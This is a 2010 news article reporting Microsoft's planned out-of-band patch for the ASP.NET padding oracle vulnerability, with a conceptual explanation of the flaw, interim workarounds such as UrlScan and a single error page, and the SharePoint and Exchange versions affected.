News

Microsoft To Release Out-of-Band Patch for ASP.NET Security Flaw

Microsoft plans to release a patch on Tuesday for a security issue associated with ASP.NET systems.

On late Friday, the company published yet another revision to its security advisory on ASP.NET systems, which added another step for IT pros applying a workaround solution. However, by early this afternoon on Monday, Microsoft announced a forthcoming patch, which will come outside the company's monthly security update cycle. The patch, rated "important," can be expected to arrive by "Tuesday, September 28, 2010 at approximately 10:00 AM PDT," according to Dave Forstrom, director of trustworthy computing at Microsoft, in a blog post.

Forstrom noted that the patch, which is described in Microsoft's advance notice bulletin, released today, will be made available initially through the Microsoft Download Center. Later, Microsoft will distribute it through other patch channels, such as Windows Update and Windows Server Update Services. He advised testing the patch beforehand. Later, the fix will be released more broadly through Microsoft's Automatic Update service.

Currently, security advisory 2416728 bears a revision date of Sept. 24, 2010, although it was revised once before. Microsoft added an additional workaround step for IT pros to carry out, but many IT pros likely will hold off for the patch coming on Tuesday. This additional step involves running a free Microsoft program called "UrlScan" designed to verify HTTP server requests. The current version of this tool, UrlScan 3.1, works with Internet Information Services (IIS) 5.1, 6.0 and 7.0 on Windows systems.

Microsoft has described this problem associated with ASP.NET systems as an information disclosure vulnerability. Security info can be gleaned through a "padding oracle" exploit. Essentially, an attacker can gain information from the server's "oracle" by sending flawed requests and interpreting the returned error messages. The oracle (an encryption component not associated with Oracle products) essentially needs to stop talking so much about its security settings.

An attacker can get password information from "cookies, ViewState, URL strings [and] hidden fields" from systems using ASP.NET and change the encrypted information, according to Microsoft blogger Vlad Azarkhin. By changing that information and querying the server, the attacker may gain enough information to impersonate the administrator, gaining access to the server, Azarkhin explained.

The objective in running UrlScan is to block "requests that specify the applications error path on the querystring," according to the revised workaround steps in the security advisory. Microsoft's general workaround solution is to configure ASP.NET to send a single error page, rather than a series of specific messages from the oracle, according to Azarkhin's latest blog post. He described the workaround as "not enough" but "vital" to apply. He noted that this problem is not specific to Microsoft products but was first discovered with the Java Server Faces Framework.

The revised security advisory specifically states that IT pros who applied the workaround previously need to go through all of the steps again. Likely, many IT pros will want to wait for the patch to arrive instead.

The vulnerability is associated with other Microsoft products that rely on ASP.NET, including SharePoint and Exchange. All Exchange systems, starting from Exchange 2003, are potentially affected and require the workaround or patch, according to this Microsoft blog.

Another Microsoft blog states that the workaround needs to be applied for systems using "SharePoint 2010, SharePoint Foundation 2010, Microsoft Office SharePoint Server 2007, Windows SharePoint Services 3.0 [and] Windows SharePoint Services 2.0." It doesn't need to be applied for systems using "SharePoint Portal Server 2003." 

Microsoft opened a forum page on the ASP.NET vulnerability to address questions. It also plans to hold a Webinar on Tuesday, Sept. 28, 2010 at 1:00 p.m. Pacific Daylight Time to answer questions from customers. The sign-up page can be accessed here.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.

comments powered by Disqus

Featured

  • Hands On: New VS Code Insiders Build Creates Web Page from Image in Seconds

    New Vision support with GitHub Copilot in the latest Visual Studio Code Insiders build takes a user-supplied mockup image and creates a web page from it in seconds, handling all the HTML and CSS.

  • Naive Bayes Regression Using C#

    Dr. James McCaffrey from Microsoft Research presents a complete end-to-end demonstration of the naive Bayes regression technique, where the goal is to predict a single numeric value. Compared to other machine learning regression techniques, naive Bayes regression is usually less accurate, but is simple, easy to implement and customize, works on both large and small datasets, is highly interpretable, and doesn't require tuning any hyperparameters.

  • VS Code Copilot Previews New GPT-4o AI Code Completion Model

    The 4o upgrade includes additional training on more than 275,000 high-quality public repositories in over 30 popular programming languages, said Microsoft-owned GitHub, which created the original "AI pair programmer" years ago.

  • Microsoft's Rust Embrace Continues with Azure SDK Beta

    "Rust's strong type system and ownership model help prevent common programming errors such as null pointer dereferencing and buffer overflows, leading to more secure and stable code."

  • Xcode IDE from Microsoft Archrival Apple Gets Copilot AI

    Just after expanding the reach of its Copilot AI coding assistant to the open-source Eclipse IDE, Microsoft showcased how it's going even further, providing details about a preview version for the Xcode IDE from archrival Apple.

Most   Popular

Subscribe on YouTube

Upcoming Training Events

0 AM